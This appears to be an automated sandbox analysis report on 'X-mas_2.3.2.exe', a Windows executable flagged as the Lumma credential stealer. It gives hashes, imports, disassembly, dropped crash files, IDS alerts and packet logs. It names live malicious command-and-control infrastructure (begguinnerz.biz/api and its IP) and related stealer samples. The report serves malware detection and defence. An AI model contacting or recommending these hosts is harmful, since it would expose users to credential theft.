https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	X-mas_2.3.2.exe, 00000000.00000003.2279589029.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, X-mas_2.3.2.exe, 00000000.00000003.2279654026.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, X-mas_2.3.2.exe, 00000000.00000003.2279519887.0000000002E5A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://begguinnerz.biz:443/api	X-mas_2.3.2.exe, 00000000.00000002.2578282722.0000000000625000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
172.67.190.223	begguinnerz.biz	United States		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1582554
Start date and time:	2024-12-30 21:19:06 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 3s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	X-mas_2.3.2.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@2/5@2/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 96% Number of executed functions: 36 Number of non-executed functions: 217
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 52.168.117.173, 172.202.163.200, 13.107.246.45, 20.3.187.198, 20.190.159.4
Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: X-mas_2.3.2.exe

Simulations

Behavior and APIs

Time	Type	Description
15:20:19	API Interceptor	7x Sleep call for process: X-mas_2.3.2.exe modified
15:20:50	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
172.67.190.223	vlid_acid.exe	Get hash	malicious	LummaC Stealer	Browse
172.67.190.223	NewI Upd v1.1.0.exe	Get hash	malicious	LummaC	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
begguinnerz.biz	vlid_acid.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.190.223
	New Upd v1.1.0.exe	Get hash	malicious	LummaC	Browse	104.21.92.91
	NewI Upd v1.1.0.exe	Get hash	malicious	LummaC	Browse	172.67.190.223

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	ReploidReplic.exe	Get hash	malicious	LummaC	Browse	104.21.48.1
	https://compliance-central.com/route/ed5305641af2fd214861ba268e4a42aa2938b075/	Get hash	malicious	Unknown	Browse	1.1.1.1
	Launcher.exe	Get hash	malicious	LummaC	Browse	104.21.96.1
	GTA-5-Mod-Menu-2025.exe	Get hash	malicious	LummaC	Browse	104.21.96.1
	AquaDiscord-2.0.exe	Get hash	malicious	LummaC	Browse	104.21.16.1
	web44.mp4.hta	Get hash	malicious	LummaC	Browse	172.67.154.95
	setup.exe	Get hash	malicious	LummaC	Browse	172.67.208.58
	SharkHack.exe	Get hash	malicious	LummaC, DarkTortilla, LummaC Stealer, PureLog Stealer, zgRAT	Browse	104.21.64.143
	Active_Setup.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	Set-up.exe	Get hash	malicious	LummaC	Browse	188.114.96.3

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	ReploidReplic.exe	Get hash	malicious	LummaC	Browse	172.67.190.223
	Bootstrapper.exe	Get hash	malicious	LummaC	Browse	172.67.190.223
	Launcher.exe	Get hash	malicious	LummaC	Browse	172.67.190.223
	GTA-5-Mod-Menu-2025.exe	Get hash	malicious	LummaC	Browse	172.67.190.223
	AquaDiscord-2.0.exe	Get hash	malicious	LummaC	Browse	172.67.190.223
	hoEtvOOrYH.exe	Get hash	malicious	SmokeLoader	Browse	172.67.190.223
	web44.mp4.hta	Get hash	malicious	LummaC	Browse	172.67.190.223
	setup.exe	Get hash	malicious	LummaC	Browse	172.67.190.223
	SharkHack.exe	Get hash	malicious	LummaC, DarkTortilla, LummaC Stealer, PureLog Stealer, zgRAT	Browse	172.67.190.223
	Active_Setup.exe	Get hash	malicious	LummaC	Browse	172.67.190.223

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_X-mas_2.3.2.exe_34b4a53e28eace8ff3cc67fe4cfe272cf25f5d_96f50eca_9bd85d15-ef6c-4f39-846f-990d223d2b43\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.0280464735717985
Encrypted:	false
SSDEEP:	96:Nxn0cBOlUOg2ytsB9hOBf77fN8QXIDcQtc6jIcEpcw3fcz+HbHg/8BRTf3o8Fa9C:jnxXtjj0DnIzfjjYmizuiFQZ24IO87G
MD5:	736A84F6782CBCE883F1AC3FB8BF760C
SHA1:	698B4ECCBB13629D650930B9441FF30BD610934B
SHA-256:	CB5057383D07086E8BD892B177EB9369349CB86D29CB99631BEE068EA1E18D7A
SHA-512:	905C535FD5C72F52D798FFD6865CEF9810BFD66749B7E621018B4FE736FEE9066CD4AF155C6455CF29E7659583E0881CAA5E41CC03FD58EC1F447057125617A7
Malicious:	true
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.0.6.3.6.2.7.8.2.6.8.4.8.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.0.6.3.6.2.8.4.5.1.8.4.0.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.b.d.8.5.d.1.5.-.e.f.6.c.-.4.f.3.9.-.8.4.6.f.-.9.9.0.d.2.2.3.d.2.b.4.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.2.6.4.a.7.5.a.-.3.c.9.6.-.4.0.2.3.-.a.b.5.e.-.5.a.f.b.7.0.9.f.6.5.6.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.X.-.m.a.s._.2...3...2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.c.4.4.-.0.0.0.1.-.0.0.1.4.-.0.a.5.3.-.0.4.3.0.f.8.5.a.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.3.2.9.e.3.5.f.4.4.7.b.a.b.2.d.c.5.7.6.6.b.4.7.5.6.2.a.c.f.7.d.0.0.0.0.f.f.f.f.!.0.0.0.0.a.0.f.b.2.8.5.8.b.3.5.9.6.5.9.1.2.b.6.1.b.8.2.c.b.5.7.5.5.9.0.b.b.5.a.4.0.1.c.7.!.X.-.m.a.s._.2...3...2...e.x.e.....T.a.r.g.e.t.A.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6233.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Mon Dec 30 20:20:28 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	51342
Entropy (8bit):	2.6642177975841355
Encrypted:	false
SSDEEP:	192:ZxXXSoQBmOlBBi/iVP6BJlefRJlNR8TixE3YqmfED+rjkDirLHwnUOU:SoSxbBi/ixB/UTYrktWQUb
MD5:	C480C6BC91C2D9C7EC3C86EC45185CF7
SHA1:	9CDD8008921C89FEDCCEF3BA3EC8144FBC90DB6B
SHA-256:	0D1592390912812D34AD79B3B7DA758BBE180E5C4672A11091560B90C39C73FE
SHA-512:	62E99C721E82847EC020338AC8356B75BCCB7AEE8903691D840F79540CEEA08B2B6E8F915AF317A73E38C022BCE270CAC53149627D2AEE901AF7276282BEC17A
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... .........sg............4...............H.......,....!...........3..........`.......8...........T............D.............4".......... $..............................................................................eJ.......$......GenuineIntel............T.......D...j.sg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER636D.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8326
Entropy (8bit):	3.6993282914347794
Encrypted:	false
SSDEEP:	192:R6l7wVeJuAC64lW5oe6YEICSUjgmgmfDYIb3J1pDB89b0drPsffv8m:R6lXJM69h6YEtSUjgmgmfdQ0dr0fZ
MD5:	6C8CBD4E6659591088F3FC4153B27AE0
SHA1:	60A6B218ABF542A1EC4EFCF6440A6075C9F759FE
SHA-256:	FC2E28F50E437C7D2078F561F7C5E4C824C21D0FFA9D4008DD71334E754AE578
SHA-512:	62129B3876589F6196FCB4FF0D10EC1855A7AD694A8EC9CF469CDE90A0E593853E1ADB43D94E35438FD983F5D9DF361ED8753F8B742B1360324DEE48B92A24B4
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.1.4.0.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER63BC.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4586
Entropy (8bit):	4.455166183546531
Encrypted:	false
SSDEEP:	48:cvIwWl8zsiJg77aI9IvrWpW8VYL0Ym8M4JrU6FYZ+q8sUG/HebZVfd:uIjfwI7aC7VcJ4Z3/6Vfd
MD5:	C1EE5C61404526FFDBDEA3591D4DA2C5
SHA1:	6341E4EAF7127C3C0CB6C35829ADDB332CD2B32B
SHA-256:	681820D605ED05386D9A5C584A1A558BF7038014A837AAADED7F9FC04D83DEF4
SHA-512:	513A549121876D6DF4E2DDFA22FCCE96477F85834F4F651F0080AD93833A685D55B3C52988B75CB490D88766D712EB2FDB5238198B1A27FCAFEF03CC8FC7F4BA
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="654443" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.421557857892218
Encrypted:	false
SSDEEP:	6144:ISvfpi6ceLP/9skLmb0OTMWSPHaJG8nAgeMZMMhA2fX4WABlEnNj0uhiTw:TvloTMW+EZMM6DFyR03w
MD5:	A4BA91004F4C6ED47D1E5BDEB29AD58E
SHA1:	A4457A0E37B1BAFFC58111DF5C2C40B5D2DB7B37
SHA-256:	650C29444F00E2D6379C6809A4097329C77168705C961D8D10E03626C2E3D97E
SHA-512:	584F9FF97E1ABA74A8688520E0106FEAED4168DAF87DD35DC7CE3A3602123DE4967DB9AB2AD58C5C7A2806E3D94E330AE79794A2F79BACDE45053EA3465DBC8D
Malicious:	false
Reputation:	low
Preview:	regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...D.Z...............................................................................................................................................................................................................................................................................................................................................t.p........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.349920652751502
TrID:	Win32 Executable (generic) a (10002005/4) 99.55% Win32 EXE PECompact compressed (generic) (41571/9) 0.41% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	X-mas_2.3.2.exe
File size:	325'632 bytes
MD5:	3dfd44f9df3a6c7b1d20a12a20ba0c67
SHA1:	a0fb2858b35965912b61b82cb575590bb5a401c7
SHA256:	a1378c290f4fa41011aed872439a21dba2604a9b1e48a53bcc518d4d101d4da8
SHA512:	be4acb1c27848e5cfaffa6d662e4515913530801f01504fccb9a8002c92d9a0ec9d80028e0803bf5fee92c801323ac5492167dff226461551407b938dbff77e1
SSDEEP:	6144:TrKgLPGKlEi1dSEdDNN5LC/hNTYTFzZHzvXJmrzJpBtaAuGRxhGaq:TrFLdlEijSEddG/7cVZTkRtaAuGRxhA
TLSH:	FF64F1A2B9A2E472C68781310531EF616E7F3C735A72858B3754277E2E303D2676631B
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........@.................................]....%U......./.U...........................Rich............PE..L.....6f.................N.

File Icon


Icon Hash:	63396de971636e0f

Static PE Info

General

Entrypoint:	0x406bb8
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x66361311 [Sat May 4 10:50:57 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	4b7ccee94e7fc8dc791130d5e1bad514

Entrypoint Preview

Instruction
call 00007F351D248F4Ah
jmp 00007F351D2443BEh
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
call 00007F351D24457Ch
xchg cl, ch
jmp 00007F351D244564h
call 00007F351D244573h
fxch st(0), st(1)
jmp 00007F351D24455Bh
fabs
fld1
mov ch, cl
xor cl, cl
jmp 00007F351D244551h
mov byte ptr [ebp-00000090h], FFFFFFFEh
fabs
fxch st(0), st(1)
fabs
fxch st(0), st(1)
fpatan
or cl, cl
je 00007F351D244546h
fldpi
fsubrp st(1), st(0)
or ch, ch
je 00007F351D244544h
fchs
ret
fabs
fld st(0), st(0)
fld st(0), st(0)
fld1
fsubrp st(1), st(0)
fxch st(0), st(1)
fld1
faddp st(1), st(0)
fmulp st(1), st(0)
ftst
wait
fstsw word ptr [ebp-000000A0h]
wait
test byte ptr [ebp-0000009Fh], 00000001h
jne 00007F351D244547h
xor ch, ch
fsqrt
ret
pop eax
jmp 00007F351D244D5Fh
fstp st(0)
fld tbyte ptr [004461EAh]
ret
fstp st(0)
or cl, cl
je 00007F351D24454Dh
fstp st(0)
fldpi
or ch, ch
je 00007F351D244544h
fchs
ret
fstp st(0)
fldz
or ch, ch
je 00007F351D244539h
fchs
ret
fstp st(0)
jmp 00007F351D244D35h
fstp st(0)
mov cl, ch
jmp 00007F351D244542h
call 00007F351D24450Eh
jmp 00007F351D244D40h
int3
int3
int3
int3
int3
int3
int3

Rich Headers

Programming Language:

[C++] VS2008 build 21022
[ASM] VS2008 build 21022
[ C ] VS2008 build 21022
[IMP] VS2005 build 50727
[RES] VS2008 build 21022
[LNK] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x45244	0xa0	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x51000	0x4330	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x5088	0x40	.text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x1c4	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x44cd8	0x44e00	2b3a28b542de0296e1a40dd1ad0ac439	False	0.854430155399274	data	7.756862705834383	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x46000	0xaef4	0x6200	24122cbfc4bd50da3f0920b252a3cdbd	False	0.09048150510204081	data	1.0928751123207585	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x51000	0x5330	0x4400	4a782bea3c13b74b705257b1fe33e319	False	0.4250919117647059	data	3.9936770241897452	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_CURSOR	0x54428	0x330	Device independent bitmap graphic, 48 x 96 x 1, image size 0			0.1948529411764706
RT_CURSOR	0x54758	0x130	Device independent bitmap graphic, 32 x 64 x 1, image size 0			0.33223684210526316
RT_ICON	0x512d0	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Romanian	Romania	0.532258064516129
RT_ICON	0x51998	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Romanian	Romania	0.4114107883817427
RT_ICON	0x53f40	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Romanian	Romania	0.44592198581560283
RT_STRING	0x54ae0	0x464	data	Romanian	Romania	0.45195729537366547
RT_STRING	0x54f48	0x3e8	data	Romanian	Romania	0.464
RT_ACCELERATOR	0x543d8	0x50	data	Romanian	Romania	0.8125
RT_GROUP_CURSOR	0x54888	0x22	data			1.0294117647058822
RT_GROUP_ICON	0x543a8	0x30	data	Romanian	Romania	0.9375
RT_VERSION	0x548b0	0x230	data			0.5285714285714286

Imports

DLL	Import
KERNEL32.dll	GetLogicalDriveStringsW, WriteConsoleInputA, EnumCalendarInfoExW, FindNextVolumeMountPointA, EscapeCommFunction, GetWindowsDirectoryA, EnumTimeFormatsW, GetProcessHandleCount, GetVersionExW, LCMapStringA, InterlockedExchange, GetLastError, SetLastError, GetProcAddress, VirtualAlloc, EnumSystemCodePagesW, SetComputerNameA, GetCurrentProcess, LoadLibraryA, InterlockedExchangeAdd, OpenEventA, GlobalWire, EnumDateFormatsA, GetModuleHandleA, SetLocaleInfoW, FreeEnvironmentStringsW, FindNextFileW, GetShortPathNameW, ReadConsoleInputW, TerminateJobObject, HeapSize, WriteConsoleW, InterlockedIncrement, InterlockedDecrement, GetAtomNameA, EnumCalendarInfoA, GetConsoleOutputCP, WriteConsoleA, GetProcessHeap, SetEndOfFile, GetLocaleInfoA, HeapReAlloc, HeapAlloc, GetStartupInfoW, TerminateProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, EnterCriticalSection, LeaveCriticalSection, RtlUnwind, HeapFree, SetHandleCount, GetStdHandle, GetFileType, GetStartupInfoA, DeleteCriticalSection, SetFilePointer, HeapCreate, VirtualFree, CloseHandle, GetModuleHandleW, Sleep, ExitProcess, WriteFile, GetModuleFileNameA, GetModuleFileNameW, GetEnvironmentStringsW, GetCommandLineW, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, RaiseException, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, ReadFile, CreateFileA, InitializeCriticalSectionAndSpinCount, SetStdHandle, WideCharToMultiByte, GetConsoleCP, GetConsoleMode, FlushFileBuffers, MultiByteToWideChar, LCMapStringW, GetStringTypeA, GetStringTypeW
USER32.dll	GetWindowTextLengthA, DdeQueryStringW, GetKeyboardType, GetComboBoxInfo, GetMenuItemID
GDI32.dll	CreateCompatibleBitmap
ADVAPI32.dll	ReadEventLogW
SHELL32.dll	DragQueryPoint
ole32.dll	CoRegisterPSClsid
WINHTTP.dll	WinHttpCheckPlatform, WinHttpSetDefaultProxyConfiguration

Possible Origin

Language of compilation system	Country where language is spoken	Map
Romanian	Romania

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-30T21:19:57.118831+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49704	172.67.190.223	443	TCP
2024-12-30T21:20:20.507183+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49704	172.67.190.223	443	TCP
2024-12-30T21:20:20.507183+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49704	172.67.190.223	443	TCP
2024-12-30T21:20:21.266715+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49741	172.67.190.223	443	TCP
2024-12-30T21:20:21.721903+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.5	49741	172.67.190.223	443	TCP
2024-12-30T21:20:21.721903+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49741	172.67.190.223	443	TCP
2024-12-30T21:20:22.469399+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49752	172.67.190.223	443	TCP
2024-12-30T21:20:23.596082+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49758	172.67.190.223	443	TCP
2024-12-30T21:20:24.806373+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49768	172.67.190.223	443	TCP
2024-12-30T21:20:26.381234+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49779	172.67.190.223	443	TCP
2024-12-30T21:20:27.757863+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	54613	172.67.190.223	443	TCP
2024-12-30T21:20:28.292238+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.5	54613	172.67.190.223	443	TCP
2024-12-30T21:20:28.593893+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	54620	172.67.190.223	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 30, 2024 21:19:56.652287006 CET	49704	443	192.168.2.5	172.67.190.223
Dec 30, 2024 21:19:56.652343988 CET	443	49704	172.67.190.223	192.168.2.5
Dec 30, 2024 21:19:56.652417898 CET	49704	443	192.168.2.5	172.67.190.223
Dec 30, 2024 21:19:56.653609037 CET	49704	443	192.168.2.5	172.67.190.223
Dec 30, 2024 21:19:56.653623104 CET	443	49704	172.67.190.223	192.168.2.5
Dec 30, 2024 21:19:57.118700981 CET	443	49704	172.67.190.223	192.168.2.5
Dec 30, 2024 21:19:57.118830919 CET	49704	443	192.168.2.5	172.67.190.223
Dec 30, 2024 21:19:57.122548103 CET	49704	443	192.168.2.5	172.67.190.223
Dec 30, 2024 21:19:57.122556925 CET	443	49704	172.67.190.223	192.168.2.5
Dec 30, 2024 21:19:57.122836113 CET	443	49704	172.67.190.223	192.168.2.5
Dec 30, 2024 21:19:57.171839952 CET	49704	443	192.168.2.5	172.67.190.223
Dec 30, 2024 21:19:57.256341934 CET	49704	443	192.168.2.5	172.67.190.223
Dec 30, 2024 21:19:57.256341934 CET	49704	443	192.168.2.5	172.67.190.223
Dec 30, 2024 21:19:57.256427050 CET	443	49704	172.67.190.223	192.168.2.5
Dec 30, 2024 21:20:20.507209063 CET	443	49704	172.67.190.223	192.168.2.5
Dec 30, 2024 21:20:20.507340908 CET	443	49704	172.67.190.223	192.168.2.5
Dec 30, 2024 21:20:20.507605076 CET	49704	443	192.168.2.5	172.67.190.223
Dec 30, 2024 21:20:20.509713888 CET	49704	443	192.168.2.5	172.67.190.223
Dec 30, 2024 21:20:20.509713888 CET	49704	443	192.168.2.5	172.67.190.223
Dec 30, 2024 21:20:20.509732008 CET	443	49704	172.67.190.223	192.168.2.5
Dec 30, 2024 21:20:20.509741068 CET	443	49704	172.67.190.223	192.168.2.5
Dec 30, 2024 21:20:20.518451929 CET	49741	443	192.168.2.5	172.67.190.223
Dec 30, 2024 21:20:20.518496990 CET	443	49741	172.67.190.223	192.168.2.5
Dec 30, 2024 21:20:20.518568993 CET	49741	443	192.168.2.5	172.67.190.223
Dec 30, 2024 21:20:20.518834114 CET	49741	443	192.168.2.5	172.67.190.223
Dec 30, 2024 21:20:20.518848896 CET	443	49741	172.67.190.223	192.168.2.5
Dec 30, 2024 21:20:21.266483068 CET	443	49741	172.67.190.223	192.168.2.5
Dec 30, 2024 21:20:21.266715050 CET	49741	443	192.168.2.5	172.67.190.223
Dec 30, 2024 21:20:21.269825935 CET	49741	443	192.168.2.5	172.67.190.223
Dec 30, 2024 21:20:21.269839048 CET	443	49741	172.67.190.223	192.168.2.5
Dec 30, 2024 21:20:21.270164967 CET	443	49741	172.67.190.223	192.168.2.5
Dec 30, 2024 21:20:21.278445959 CET	49741	443	192.168.2.5	172.67.190.223
Dec 30, 2024 21:20:21.278474092 CET	49741	443	192.168.2.5	172.67.190.223
